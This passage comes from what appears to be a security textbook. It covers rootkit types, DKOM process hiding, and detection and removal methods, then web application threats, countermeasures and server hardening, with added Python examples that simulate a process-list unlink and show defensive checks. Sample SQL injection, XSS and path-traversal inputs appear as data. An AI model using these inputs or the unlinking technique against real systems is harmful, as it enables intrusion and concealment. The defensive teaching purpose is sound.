There are several basic types of rootkit. We discuss them in detail as
follows.
Persistent Rootkit:
A persistent rootkit activates each time the system boots. Its
components are stored on disk, and it normally relies on an autostart
entry in the system registry (or another boot-time mechanism) to be
launched again.
Memory-Based or non-Persistent Rootkit:
Memory-based rootkits will not automatically run after a reboot; they
exist only in memory and are lost when the computer reboots.
User-mode Rootkit:
User-mode rootkits operate at the application layer and intercept the
calls going from applications through the system API (Application
Programming Interface) to the kernel. These rootkits often replace or
patch system binaries and libraries with malicious code that hands
control of the computer to the creator of the rootkit.
138 http://www.guidingtech.com/4467/what-is-a-rootkit/
139 http://www.5starsupport.com/tutorial/rootkits.htm
Kernel-mode Rootkit:
Kernel-mode rootkits hook the kernel's APIs and modify data structures
within the kernel itself. These are the most effective and dangerous
types of rootkits. Kernel-mode rootkits are very difficult to detect and
can hide on a system without any indication of being active, because
they run with the same privileges as the detection software.
Bootkit:
Bootkits are variants of kernel-mode rootkits that infect the Master
Boot Record (MBR), so their code runs before the operating system itself
boots and can subvert it as it loads.
Firmware:
A firmware rootkit infects a device or piece of hardware where code
resides, such as a network card or the system BIOS.
Hypervisor
These are newer types of rootkits that are infecting the hypervisor
layer of a virtual machine setup. The hypervisor is basically the layer
between physical hardware (host systems) and the virtual system
(guest), although a type II hypervisor can be installed on top of an OS
in order to present a virtual layer to the virtual system. These rootkits
can intercept hardware “calls” going to the original operating
systems.140
Categories:
There are two basic categories that modern rootkits in the wild can be
divided into: those designed to hook, and those designed to use DKOM.
Both are explained below. Hacker Defender is one of the more popular
rootkits that works by hooking; it hides processes, services, files,
registry keys and ports. FU is a popular rootkit designed to use DKOM;
FU can hide processes and device drivers and elevate the privileges and
group memberships of any Windows process.
140 http://www.technibble.com/how-to-remove-a-rootkit-from-a-windows-system/
Hooks:
In the section above we mentioned hooks. A hook, or hooking, is a
method used by a rootkit to alter the normal execution path of the
operating system. Modern operating systems are designed to be
flexible, extensible and backward compatible: if they were not, you
would have to replace all your application software with newer
versions every time you got a newer computer or operating system.
This is why, if you upgraded to, say, Windows XP, your other software
still ran on Windows XP as it did on your older operating system. The
same extension points that make this possible are what a rootkit
abuses.
By using a hook, a rootkit can alter the information that the original
operating system function would have returned, filtering it according
to the rootkit's own design as programmed by the attacker (for example,
removing its own entries from a directory listing or process list).
Some of the more common places a rootkit will hook are: the execution
paths of system calls, import address tables, the system service
descriptor table (SSDT), and layered filter drivers.
DKOM:
DKOM stands for Direct Kernel Object Manipulation. Rootkits that use
DKOM do not hook any code path; instead they write directly to the
kernel's own data structures, the objects the kernel creates to keep
track of processes, threads, drivers and tokens. The classic example is
process hiding: the kernel keeps every process object in a doubly
linked list, and tools such as Task Manager enumerate processes by
walking that list. The rootkit patches the forward and backward
pointers of the neighbouring entries so that they skip over its own
process object. The process is no longer found by the list walk, but it
keeps running, because the scheduler works from the thread objects
rather than from that list. Because nothing was hooked and no code was
modified, the usual integrity checks see nothing wrong, and the hidden
object can only be found by comparing views: for example, the list walk
against a scan of the process ID table, or against a scan of raw memory
for process structures.141
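The DKOM unlink and the cross-view check that catches it, as an added example (not from the book and not from the FU rootkit): a simulation of the kernel's doubly linked process list and of a second, independent view of the same processes (a PID table, like the handle table the Windows kernel keeps). The process names and PIDs are constructed.

```python
class ProcessObject:
    """Stand-in for the kernel's per-process structure (EPROCESS on Windows)."""

    def __init__(self, pid, name):
        self.pid, self.name = pid, name
        self.flink = self.blink = self   # list links; point to self until inserted


class KernelState:
    """Two views the kernel keeps of the same processes."""

    def __init__(self):
        self.head = ProcessObject(0, "<list head>")   # sentinel of the active list
        self.pid_table = {}                           # like PspCidTable: pid -> object
        self.threads = {}                             # pid -> thread count (scheduler's view)

    def create_process(self, pid, name, threads=1):
        p = ProcessObject(pid, name)
        tail = self.head.blink
        tail.flink, p.blink, p.flink, self.head.blink = p, tail, self.head, p
        self.pid_table[pid] = p
        self.threads[pid] = threads
        return p

    def walk_active_list(self):
        """What Task Manager style enumeration does: follow flink from the head."""
        out, cur = [], self.head.flink
        while cur is not self.head:
            out.append(cur.pid)
            cur = cur.flink
        return out


def dkom_hide(kernel, pid):
    """Unlink the object from the list; touch nothing else. The process keeps its
    threads, its PID table entry and its memory, so it keeps running."""
    p = kernel.pid_table[pid]
    p.blink.flink = p.flink
    p.flink.blink = p.blink
    p.flink = p.blink = p   # self-linked, so a later unlink on exit corrupts nothing
    return p


def cross_view_detect(kernel):
    """PIDs present in the PID table but absent from the list walk are hidden."""
    listed = set(kernel.walk_active_list())
    return sorted(pid for pid in kernel.pid_table if pid not in listed)


def demo():
    k = KernelState()
    for pid, name in [(4, "System"), (612, "lsass.exe"), (1337, "backdoor.exe"), (2048, "explorer.exe")]:
        k.create_process(pid, name)
    before = k.walk_active_list()
    dkom_hide(k, 1337)
    after = k.walk_active_list()
    return before, after, cross_view_detect(k), k.threads[1337]


if __name__ == "__main__":
    before, after, hidden, threads = demo()
    print("list walk before:", before)
    print("list walk after: ", after)
    print("cross-view found:", hidden, "threads still scheduled:", threads)
```

This comparison of two views is exactly what rootkit detectors do: one enumeration through the official list, another through a source the rootkit did not alter, and every disagreement is a hidden object.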
19.5 So how does a computer get infected with a rootkit?
As mentioned above, a rootkit may piggyback on software that you
thought you trusted. When you give that software permission to install
on your computer, it also inserts a process that waits silently in the
background for a command, and since granting that permission requires
administrative access, the rootkit is already in a sensitive location
on the computer.
Another way to get infected is through standard viral infection
techniques, either through shared disks and drives or through infected
web content. Such an infection may not be easily spotted because of the
silent nature of rootkits.
There have also been cases where rootkits came pre-installed on
purchased computers. The intentions behind such software may be good,
for example anti-theft identification or remote diagnosis, but it has
been shown that the mere presence of such a path into the system is
itself a vulnerability.142
141 http://www.5starsupport.com/tutorial/rootkits.htm
142 http://www.guidingtech.com/4467/what-is-a-rootkit/
19.6 Generic symptoms of rootkit infestation
Rootkits are frustrating. By design, it’s difficult to know if they are
installed on a computer. Even experts have a hard time but hint
that installed rootkits should get the same consideration as other
possible reasons for any decrease in operating efficiency. Sorry for
being vague, but that’s the nature of the beast. Here’s a list of
noteworthy symptoms:
If the computer locks up or fails to respond to any kind of input
from the mouse or keyboard, it could be due to an installed
kernel-mode rootkit.
Settings in Windows change without permission. Examples of
this could be the screensaver changing or the taskbar hiding
itself.
Web pages or network activities appear to be intermittent or
function improperly due to excessive network traffic.
If the rootkit is working correctly, most of these symptoms aren’t
going to be noticeable. By definition, good rootkits are stealthy.
The last symptom (network slowdown) should be the one that
raises a flag. Rootkits can’t hide traffic increases, especially if the
computer is acting as a spam relay or participating in a DDoS
attack.143
19.7 How to remove the Rootkit?
There are different approaches and really no single foolproof
method, nor is it guaranteed that the rootkit will be fully
removed. As a matter of fact, there are some computer security
experts who simply recommend formatting the drive and
completely re-installing the operating system.
The Manual Method
This may or may not be more time consuming than searching
with an automatic tool. If you are familiar with legitimate
Windows services and programs and can pick out suspicious files,
then this could be the way to go. Many times, rootkit scanners
will not detect rootkit infections, especially if they are new, so this
may be the way to go if you don't want to go straight to the nuke-
and-pave solution.
143 http://www.techrepublic.com/blog/10things/10-things-you-should-know-about-rootkits/416
Rootkit detection is difficult because a rootkit may be able to
subvert the software that is intended to find it. Detection methods
include using an alternative and trusted operating system,
behaviour-based methods, signature scanning, difference
scanning, and memory dump analysis. Removal can be
complicated or practically impossible, especially in cases where
the rootkit resides in the kernel; reinstallation of the operating
system may be the only available solution to the problem. When
dealing with firmware rootkits, removal may require hardware
replacement or specialized equipment.144
The reliable ways of manually detecting rootkits
I. Defeat A Rootkit Using A System Copy
If an uninfected copy of the test system is available as a reference,
rootkits can be detected by doing a file-by-file comparison between
the current system and the uninfected copy.
Here the infected system is treated just as data, so the cloaking
effect of the rootkit is not in play. In this situation, the rootkit and
its payload can be easily discovered.
However, this is a situation that would be rarely encountered in
practice, as almost no one has a reference copy of their system.
Systems are not static anyway... legitimate changes are constantly
taking place within a system and such changes make simple file
comparisons difficult.
II. Defeat A Rootkit Using An Alternative Boot Device
The best rootkit detection method requires you to shut down the
system and check its storage by choosing an alternative boot
device, such as a CD-ROM or a USB drive. Because the system
boots from an alternative media source, you will be able to bypass
the rootkit. So, now you know how to prevent the rootkit from
becoming active, but not yet how to detect and remove it.
A recommended way to detect the presence of a rootkit is to
boot from alternative media which is known to be clean (i.e. a
backup, or a rescue CD-ROM) and check the suspect system. The
advantage of this method is that the rootkit will not be running
(therefore it will not be able to hide itself) and the system files will
not be actively tampered with.
144 http://en.wikipedia.org/wiki/Rootkit
III. By Comparing Clean MD5 Fingerprints
One way is to have clean MD5 fingerprints of the original system
files and compare them against the fingerprints of the current
system files. This method is not very reliable, but is better than
nothing. Using a kernel debugger is more reliable, but it requires
in-depth knowledge of the operating system.
IV. Defeat A Rootkit With Data Wiping
Once rootkits are detected, you should do a data wipe instead of a
delete or format. Data wiping is a more secure way of eliminating
the rootkit problem and guards privacy and security at a higher
level; formatting alone may not remove the rootkit.
After a fresh installation of the operating system you should
fingerprint the files and save the logs. Also, do this after installing
other software titles and compare the reports. Now you'll be able to
compare these logs with your current live system to determine
whether there has been a further rootkit infection.
Although this approach is a bit complicated and not advisable for the
majority of home users, it is also the most effective rootkit
prevention technique. Specialists refer to this as "fingerprinting":
during the process a hash function is used to track down changes
in the data. Comparison of the hash files will reveal changes that
were not made intentionally by the system administrator, thus
revealing any hidden rootkits.
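The fingerprinting described in methods III and IV above, as an added example that is not part of the original book: a baseline of file digests is taken while the system is known to be clean, and a later scan is compared against it to list files that were added, removed or modified. The directory layout and file contents are constructed for the demonstration, and SHA-256 is used in place of the MD5 named in the text (MD5 is no longer collision-resistant, so an attacker can craft a replacement with the same MD5). As the text stresses, the second scan is only trustworthy when it runs from clean boot media, where the rootkit is not active to lie about file contents.

```python
import hashlib
import os
import tempfile


def hash_file(path, algorithm="sha256"):
    """Hex digest of one file, read in chunks so large binaries fit in memory."""
    digest = hashlib.new(algorithm)
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def fingerprint_tree(root, algorithm="sha256"):
    """Map every regular file under root (relative path, '/' separators) to its digest."""
    fingerprints = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue  # only regular files are fingerprinted; symlinks are skipped
            relative = os.path.relpath(full, root).replace(os.sep, "/")
            fingerprints[relative] = hash_file(full, algorithm)
    return fingerprints


def compare_fingerprints(baseline, current):
    """Return (added, removed, modified) relative paths, each list sorted."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return added, removed, modified


def demo():
    """Constructed scenario: baseline a tiny tree, tamper with it, then re-check."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        for name in ("ls", "ps"):
            with open(os.path.join(root, "bin", name), "wb") as handle:
                handle.write(b"legitimate " + name.encode() + b" binary (constructed)")
        baseline = fingerprint_tree(root)  # taken while the system is known clean

        # Simulate what a later scan from clean boot media would find:
        # one system tool replaced and one unexpected file dropped.
        with open(os.path.join(root, "bin", "ps"), "wb") as handle:
            handle.write(b"modified ps binary (constructed)")
        with open(os.path.join(root, "bin", "extra"), "wb") as handle:
            handle.write(b"unexpected new file (constructed)")
        return compare_fingerprints(baseline, fingerprint_tree(root))


if __name__ == "__main__":
    added, removed, modified = demo()
    print("added:", added, "removed:", removed, "modified:", modified)
```

In practice the baseline dictionary is written to read-only media (or signed) right after installation and after each legitimate software install, exactly as the text recommends, so that a modified `bin/ps` or a new `bin/extra` stands out in the comparison rather than in a list of thousands of routine changes.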
V. By signature or heuristics-based antivirus programs
Rootkit binaries can often be detected by signature or heuristics-
based antivirus programs, at least until they're run by a user and
are able to attempt to conceal themselves. There are inherent
limitations for any program that attempts to detect rootkits while
the program is running under the suspect system. Rootkits are
suites of programs that modify many of the core system tools and
libraries upon which all programs on the system depend. Some
rootkits attempt to modify the running operating system via
loadable modules on Linux (and some other UNIX varieties), and
through VxDs, virtual external device drivers on MS Windows
platforms. The fundamental problem with rootkit detection is that
if the operating system currently running has been subverted, it
cannot be trusted, including to find unauthorized modifications to
itself or its components. In other words, actions such as requesting
a list of all running processes, or a list of all files in a directory,
cannot be trusted to behave as intended by the original designers.
Tools:
AutoRuns, Process Explorer, msconfig, AVG's Rootkit Scanner
These tools can be used to find suspicious processes and files,
and each has its own form of analysis.
If these rootkit scanners are not finding anything, or they do find
something but can't delete it, then you may have to move to the
manual method. You can also keep trying other tools, but there
does come a point when you have to evaluate whether the time and
effort is worth it, or whether you should either try a manual method
or perform a full re-installation of the operating system.145
145 http://www.technibble.com/how-to-remove-a-rootkit-from-a-windows-system/
19.8 How to protect computers against Rootkit?
Each of the detection techniques above has its limitations, and for
this reason it is highly recommended to integrate various different
technologies. It must also be taken into account that some rootkits
are expressly designed to avoid detection by the antivirus companies
that lead the market.
The first line of defence against rootkits consists of preventing
them from entering your computer. To do this, please bear in mind
the following basic advice on protection against malware:
Install a good antimalware solution on your computer, and
always keep it activated and updated.
Install a firewall that will protect against unauthorized access
to your computer.
Always ensure that the applications installed on your computer
are kept up-to-date, and make sure to install any security
patches supplied by manufacturers.
However, the task of protecting yourself against rootkits is not
to be taken lightly, and cannot be limited to a series of generic
protection measures.
In order to help users detect the existence of rootkits on their
computers and delete them with absolute precision, Panda
Security makes available the tool Panda Anti-Rootkit. Use this free
utility to detect and delete any possible rootkits on your
computer.146
146 http://www.pandasecurity.com/homeusers/security-info/types-malware/rootkit/
CHAPTER 20
Web Application Security
Objective
20.1 Introduction
20.2 Risk Associated With Web Application
20.3 Anatomy of Web Attack
20.4 Web Application Threats
20.5 Hacking Tools
20.6 Countermeasures
20.7 Hacking of Web Server
20.8 Hardening of Web Server
20.1 Introduction
As most businesses rely on web sites to deliver content to their
customers, interact with customers, and sell products, certain
technologies are often deployed to handle the different tasks of a web
site. A content management system like Joomla or Drupal may be the
solution used to build a robust web site filled with product- or service-
related content. Businesses often turn to blogs using applications like
WordPress or forums running on phpBB that rely on user generated
content from the community to give customers a voice through
comments and discussions. ZenCart and Magento are often the solutions
to the e-commerce needs of both small and large businesses who sell
directly on the web. Add in the thousands of proprietary applications
that web sites rely on, and it is clear why securing web applications
should be a top priority for any web site owner, no matter how big or
small.147
147 http://www.applicure.com/solutions/web-application-security
[Figure: web application overview image, see footnote 148]
Web Application Hacking
Various high-profile hacking attacks have proven that web
security remains the most critical issue to any business that conducts its
operations online. Web servers are one of the most targeted public faces
of an organization, because of the sensitive data they usually host.
Securing a web server is as important as securing the website or web
application itself and the network around it. If you have a secure web
application and an insecure web server, or vice versa, it still puts your
business at a huge risk. Your company's security is as strong as its
weakest point.
Although securing a web server can be a daunting operation and requires
specialist expertise, it is not an impossible task. Long hours of research
and an overdose of coffee and take-away food can save you from long
nights at the office, headaches and data breaches in the future.
Regardless of what web server software and operating system you are
running, an out-of-the-box configuration is usually insecure. Therefore
one must take some necessary steps in order to increase web server
security.149
20.2 Risks Associated with Web Applications
Web applications allow visitors access to the most critical resources of a
web site, the web server and the database server. As with any software,
developers of web applications spend a great deal of time on features and
functionality and dedicate very little time to security. It's not that
developers don't care about security; nothing could be further from the
truth. The reason so little time is spent on security is often a lack
of understanding of security on the part of the developer or a lack of time
dedicated to security.
148 http://www.appneta.com/uploadimages/Web-Applications.jpg
149 http://www.acunetix.com/websitesecurity/webserver-security/
For whatever reason, applications are often riddled with vulnerabilities
that are used by attackers to gain access to either the web server or the
database server. From there any number of things can happen. They
can:
Deface a web site
Insert spam links directing visitors to another site
Insert malicious code that installs itself onto a visitor's computer
Insert malicious code that steals session IDs (cookies)
Steal account information (credit cards)
Steal information stored in the database
Access restricted content
Carry out a Domain Name System (DNS) attack
Carry out a denial of service
Exploit a buffer overflow
Exploit server side scripting150
20.3 Anatomy of Web Application Attack:
Hackers always find new ways to compromise your web application's
security, but there are patterns they follow in every attempt of an
attack. Knowing these patterns is essential for closing security gaps
and preventing your system from being hacked.151
150 http://www.applicure.com/solutions/web-application-security
151 http://www.securitybay.co.uk/articles/anatomy-of-a-web-application-attack
20.4 Web Application Threats:
Malicious users will examine a website and its infrastructure to
understand its design and identify any potential weakness that can be
exploited. Web application vulnerabilities provide the potential for an
unauthorized user to gain access to critical information, use resources
inappropriately, or interrupt legitimate campus business. How the
exploitation is carried out varies depending upon the weakness found
and the goal of the exploiter.152 Many web application threats exist on a
web server. The following are the most common threats:
Cross-site scripting
Cross site scripting (also known as XSS) occurs when a web
application gathers malicious data from a user. The data is usually
gathered in the form of a hyperlink which contains malicious
content within it. The user will most likely click on this link from
another website, an instant message, or simply while reading a web
board or email message. Usually the attacker will encode the
malicious portion of the link to the site in hex (or other encoding
methods) so the request looks less suspicious to the user when
clicked on. After the data is collected by the web application, it
creates an output page for the user containing the malicious data
that was originally sent to it, but in a manner that makes it appear as
valid content from the website. Many popular guestbook and forum
programs allow users to submit posts with HTML and JavaScript
embedded in them. If for example I was logged in as "john" and
read a message by "joe" that contained malicious JavaScript in it,
then it may be possible for "joe" to hijack my session just by
my reading his bulletin board post.153
152 http://inews.berkeley.edu/articles/Aug-Sep2010/web-app-vulnerabilities
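The guestbook scenario above, as an added example that is not part of the original book: two renderers for a board of posts, one that copies user text straight into the page and one that escapes it first. The posts are constructed; "joe"'s post carries a harmless script tag so the difference in the rendered HTML is visible, and `contains_live_script` checks whether an actual tag survived into the output.

```python
import html


def render_post_unsafe(author, body):
    """Echo user content straight into HTML: whatever the post contains becomes markup."""
    return '<div class="post"><b>%s</b>: %s</div>' % (author, body)


def render_post_safe(author, body):
    """Escape on output, so the browser shows the post as text instead of running it.

    html.escape converts < > & " ' to entities, which covers HTML text and
    quoted-attribute contexts; JavaScript or URL contexts need their own encoding.
    """
    return '<div class="post"><b>%s</b>: %s</div>' % (html.escape(author), html.escape(body))


def render_board(posts, renderer):
    """Render a whole board with the chosen per-post renderer."""
    return "\n".join(renderer(author, body) for author, body in posts)


def contains_live_script(rendered):
    """True if a real <script> tag is present in the rendered page."""
    return "<script" in rendered.lower()


# Constructed posts: one ordinary message and one that embeds markup.
POSTS = [
    ("john", "Welcome to the board"),
    ("joe", "Nice board <script>alert('xss')</script>"),
]


if __name__ == "__main__":
    print(render_board(POSTS, render_post_unsafe))
    print(render_board(POSTS, render_post_safe))
```

The escaped rendering shows `&lt;script&gt;` literally to the reader, so "john" sees joe's text but his browser never executes it; this is the "thorough input validation" countermeasure of section 20.6 applied at the output side, where the context (HTML text, attribute, script, URL) decides which encoding is correct.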
[Figure: cross-site scripting illustration, see footnote 154]
SQL Injection
SQL Injection works by the attacker finding an area on a web site
that allows user input which is not filtered for escape characters.
User login areas are often targeted because they have a direct link
to the database, since credentials are often checked against a user
table of some sort. By injecting a SQL statement, like ' ) OR 1=1--,
the attacker can access information stored in the web site's
database. Of course, the example used above represents a
relatively simple SQL statement. Ones used by attackers are often
much more sophisticated if they know what the tables in the
database are, since these complex statements can generally
produce better results.
153 http://www.cgisecurity.com/xss-faq.html
154 http://www.website-guardian.com/ArticleImages/6.jpg
[Figure: SQL injection illustration, see footnote 155]
Command injection:
Command execution vulnerabilities allow attackers to pass
arbitrary commands to other applications. In severe cases, the
attacker can obtain system level privileges, allowing them to attack
the servers from a remote location and execute whatever
commands they need for their attack to be successful.156
155 http://amolpednekar4081.files.wordpress.com/2011/01/sql-inject.png?w=614
156 http://www.applicure.com/solutions/web-application-security
[Figure: see footnote 157]
Cookies\Session Poisoning:
A cookie is a small piece of text stored on a user's computer by a
web browser. It is sent as an HTTP header by a web server to a web
browser and then sent back unchanged by the browser each time it
accesses that server. A cookie can be used for authentication,
session tracking, and remembering specific information about
users, such as site preferences or the contents of their electronic
shopping carts.
The process of tampering with the value of cookies is called cookie
poisoning. Poisoning allows an attacker to inject malicious
content, modify the user's on-line experience, and obtain
unauthorized information. A proxy can be used for rewriting the
session data, displaying the cookie data, and/or specifying a new
or different session identifier in the cookie.
Buffer Overflow:
A buffer overflow occurs when data written to a buffer, due to
insufficient bounds checking, corrupts data values in memory
addresses adjacent to the allocated buffer. Most commonly this
occurs when copying strings of characters from one buffer to
another. It is used to corrupt the execution stack of a web
application.
157 http://vuln.sg/nullftpserver4.jpg
Authentication Hijacking:
The hacker steals a session once a user has authenticated. Session
hijacking is the act of taking control of a user session after
successfully obtaining or generating an authentication session ID.
Session hijacking involves an attacker using captured, brute forced
or reverse-engineered session IDs to seize control of a legitimate
user's Web application session while that session is still in
progress.158
Directory traversal / Unicode:
A directory traversal (or path traversal) consists of exploiting
insufficient security validation / sanitization of user-supplied input
file names, so that characters representing "traverse to parent
directory" are passed through to the file APIs.
The goal of this attack is to order an application to access
a computer file that is not intended to be accessible. This attack
exposes the directory structure of the application, and often the
underlying web server and operating system.
Directory traversal is also known as the ../ (dot dot slash)
attack, directory climbing, and backtracking. Some forms of this
attack are also canonicalization attacks.159
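The canonicalization defence for the traversal described above, as an added example that is not part of the original book: a file-serving routine resolves the requested name under its permitted directory and refuses anything whose resolved path lands outside it. The directory layout and the list of requested names are constructed; the routine decodes percent-encoding once, as a web server would before the name reaches the application, so the encoded "../" form named under the Unicode heading is caught as well.

```python
import os
import tempfile
from urllib.parse import unquote


class TraversalError(ValueError):
    """Raised when a requested path would resolve outside the permitted directory."""


def resolve_under(base_dir, user_path):
    """Canonicalise user_path relative to base_dir and refuse anything that escapes it.

    The test is made on the resolved path (symlinks followed, '..' collapsed), not on
    the raw string, so indirect or encoded forms of '..' are treated the same way.
    """
    base = os.path.realpath(base_dir)
    # Decode percent-encoding once, as the web server would have, so that a '..'
    # written as '%2e%2e' is visible before the path is normalised.
    candidate = os.path.realpath(os.path.join(base, unquote(user_path)))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:  # different drives on Windows: certainly not inside
        inside = False
    if not inside:
        raise TraversalError("%r resolves outside %r" % (user_path, base_dir))
    return candidate


def demo():
    """Constructed layout: a public 'docs' directory beside a file that must stay private."""
    with tempfile.TemporaryDirectory() as root:
        docs = os.path.join(root, "docs")
        os.makedirs(docs)
        with open(os.path.join(docs, "readme.txt"), "w") as handle:
            handle.write("public (constructed)")
        with open(os.path.join(root, "secret.txt"), "w") as handle:
            handle.write("private (constructed)")

        # Requested names as they might arrive in a URL parameter (constructed).
        requests = ["readme.txt", "sub/../readme.txt", "../secret.txt",
                    "%2e%2e/secret.txt", "/outside/file.txt"]
        outcome = {}
        for requested in requests:
            try:
                resolve_under(docs, requested)
                outcome[requested] = "allowed"
            except TraversalError:
                outcome[requested] = "blocked"
        return outcome


if __name__ == "__main__":
    for requested, result in demo().items():
        print("%-20s %s" % (requested, result))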
Cryptographic Interception:
Cryptography can be used to send confidential messages between
two parties. Encrypted traffic flows through network firewalls and
IDS and is not inspected. If an attacker is able to take
advantage of a secure channel, he can exploit it more efficiently
than an open channel. Attackers can decrypt encrypted data if
they have access to the encryption key or can derive the encryption
key. Attackers can discover a key if keys are managed poorly or if
they were generated in a non-random fashion. An encryption
algorithm provides no security if the encryption is cracked or is
vulnerable to brute force cracking. Custom algorithms are
particularly vulnerable if they have not been tested.
158 http://www.scribd.com/doc/35607828/17/Authentication-Hijacking
159 http://en.wikipedia.org/wiki/Directory_traversal_attack
Parameter / form tampering:
Websites often pass information from one web page to the next
through URL parameters. For example, if you search on Google,
your search terms will be passed to the results page through the
URL. A hacker can take advantage of this fact to rewrite these
parameters in harmful ways.160
Cookie Snooping:
In an attempt to protect cookies, site developers often encode the
cookies. Cookie snooping techniques can use a local proxy to
enumerate cookies.
Log Tampering:
Logs are used to keep track of the usage patterns of the application.
Log tampering allows attackers to cover their tracks or alter web
transaction records. Attackers strive to delete logs, modify logs,
change user information, or otherwise destroy evidence of any
attack.
Error message Interception:
Information in error messages is often rich with site-specific
information which can help to determine the technologies used in
the web application.
Web Services Attack:
Web services allow process-to-process communication between
web applications. An attacker can inject a malicious script into a
web service that will enable disclosure and modification of the
data.
160 http://www.commonplaces.com/inspiring-conversation/team-posts/six-threats-web-application-security-and-what-you-can-do-about
Zero-Day Attacks:
Zero-day attacks take place between the time a vulnerability is
discovered by a researcher or attacker and the time that the
vendor issues a corrective patch. Such a vulnerability is a launching
point for further exploitation of the web application and its
environment.
20.5 Hacking Tools:
1. Instant Source: The Instant Source tool allows us to see and edit
the HTML source code of web pages. It can be executed from the
Internet.
2. Wget: Wget is a command line tool for Windows and UNIX. Wget
will download the contents of a website. It works non-interactively
in the background after the user logs off.
3. Websleuth: Websleuth is a tool that combines spidering with
the capability of a personal proxy.
4. Blackwidow: Black Widow is a website scanner, a site mapping
tool, a site ripper, a site mirroring tool, and an offline browser
program.
5. WindowBomb: An e-mail sent with this HTML code attached will create
pop-up windows until the PC's memory is exhausted.
6. CookieDigger Tool: It helps to identify weak cookie generation
and insecure implementation of session management by a web
application.
7. SSL Digger Tool: It is a tool to assess the strength of SSL
servers by testing the supported ciphers.
8. Acunetix Web Scanner: Acunetix launches all the Google
hacking database queries against the crawled content of a website.
20.6 Countermeasures:
Threat: Cross-site scripting
Countermeasures:
- Perform thorough input validation of cookies, query string, form
fields and hidden fields.
- Adopt a security policy.
Threat: SQL Injection
Countermeasures:
- Perform thorough input validation. Your application should validate
its input prior to sending a request to the database.
- Use parameterized stored procedures for database access to ensure
that input strings are not treated as executable statements. If you
cannot use stored procedures, use SQL parameters when you build SQL
commands.
- Use least privileged accounts to connect to the database.
Threat: Command Injection
Countermeasures:
- Use language-specific libraries that avoid problems due to shell
commands.
- Validate the data to prevent any malicious content.
- Structure requests so that all supplied parameters are treated as
data, rather than potentially executable content.
Threat: Cookies\Session Poisoning
Countermeasures:
- Use an encrypted communication channel provided by SSL whenever an
authentication cookie is transmitted.
- Set the cookie timeout to a value that forces authentication after a
relatively short time interval. Although this doesn't prevent replay
attacks, it reduces the time interval in which the attacker can replay
a request without being forced to re-authenticate because the session
has timed out.
Threat: Buffer Overflow
Countermeasures:
- Validate input length in forms.
- Check bounds and take extra care when using loops to copy data.
Threat: Authentication Hijacking
Countermeasures:
- Use secure channels for authentication methods.
- Use cookies in a secure manner where possible.
Threat: Cryptography
Countermeasures:
- Use built-in encryption routines that include secure key management.
The Data Protection application programming interface (DPAPI) is an
example of an encryption service provided on Windows 2000 and later
operating systems where the operating system manages the key.
- Use strong random key generation functions and store the key in a
restricted location (for example, in a registry key secured with a
restricted ACL) if you use an encryption mechanism that requires you
to generate or manage the key.
- Encrypt the encryption key using DPAPI for added security.
Threat: Directory traversal
Countermeasures:
- Use strong access controls to protect data in persistent stores to
ensure that only authorized users can access and modify the data.
- Use role-based security to differentiate between users who can view
data and users who can modify data.
Threat: Parameter\form tampering
Countermeasures:
- Field validity check.
Threat: Cookie Snooping
Countermeasures:
- Use an encrypted communication channel provided by SSL whenever an
authentication cookie is transmitted.
- Set the cookie timeout to a value that forces authentication after a
relatively short time interval. Although this doesn't prevent replay
attacks, it reduces the time interval in which the attacker can replay
a request without being forced to re-authenticate because the session
has timed out.
Threat: Log Tampering
Countermeasures:
- Secure log files by using restricted ACLs.
- Relocate system log files away from their default locations.
- Digitally sign and stamp logs.
Threat: Error message Interception
Countermeasures:
- Website cloaking capabilities make enterprise web resources invisible
to attackers.
Threat: Web Services Attack
Countermeasures:
- Turn off web services that are not required for regular operation.
- Provision for multiple layers of protection.
- Block all unknown paths.
Threat: Zero-Day Attacks
Countermeasures:
- Enforce stringent security policies.
- Deploy a firewall.161
20.7 Hacking Web Servers
Understanding how web servers are hacked includes knowing their
vulnerabilities, as well as understanding the types of attacks, including
Internet Information Server (IIS) Unicode exploits. In addition, you
should know when to use patch-management techniques and understand
the methods used to harden web servers.
List the Types of Web Server Vulnerabilities:
Web servers, like other systems, can be compromised by a hacker. The
following vulnerabilities are most commonly exploited in web servers:
Mis-configuration of the web server software
161 http://www.scribd.com/doc/35607828/17/Authentication-Hijacking
http://msdn.microsoft.com/en-us/library/ff648641.aspx#c02618429_015
Operating system or application bugs, or flaws in programming
code
Vulnerable default installation of operating system and web server
software, and/or lack of patch management to update operating
system or web server software
Lack of or not following proper security policies and procedures
Hackers exploit these vulnerabilities to gain access to the web server.
Because web servers are located in a Demilitarized Zone (DMZ), which is
a publicly accessible area between two packet filtering devices, and can
be more easily accessed by the organization’s client systems, an exploit of
a web server offers a hacker easier access to internal systems or
databases.
Attacks against Web Servers:
The most visible type of attack against web servers is defacement.
Hackers deface websites for sheer joy and as an opportunity to enhance
their reputations. Defacing a website means the hacker exploits a
vulnerability in the operating system or web server software and then
alters the website files to show that the site has been hacked. Often the
hacker displays their hacker name on the website's home page. Common
website attacks that enable a hacker to deface a website include the
following:
Capturing administrator credentials through man-in-the-middle
attacks.
Revealing an administrator password through a brute-force attack.
Using a DNS attack to redirect users to a different web server.
Compromising an FTP or e-mail server.
Exploiting web application bugs that result in a vulnerability.
Mis-configuring web shares.
Taking advantage of weak permissions.
Rerouting a client after a firewall or router attack.
Using SQL injection attacks (if the SQL server and web server are
the same system).
Using Telnet or Secure Shell (SSH) intrusion.
Carrying out URL poisoning, which redirects the user to a different
URL.
Using web server extension or remote service intrusion.
For cookie-based security, intercepting the communication between
the client and the server and changing the cookie to make the server
believe that there is a user with higher privileges.
20.8 Web Server Hardening Methods
A web server administrator can do many things to harden a server
(increase its security). The following are ways to increase the
security of the web server:
Rename the administrator account, and use a strong password.
Disable default websites and FTP sites.
Remove unused applications from the server, such as WebDAV.
Disable directory browsing in the web server's configuration
settings.
Add a legal notice to the site to make potential attackers aware of
the implications of hacking the site.
Apply the most current patches, hotfixes, and service packs to the
operating system and web server software.
Perform bounds-checking on input for web forms and query strings
to prevent buffer overflow or malicious input attacks.
Disable remote administration.
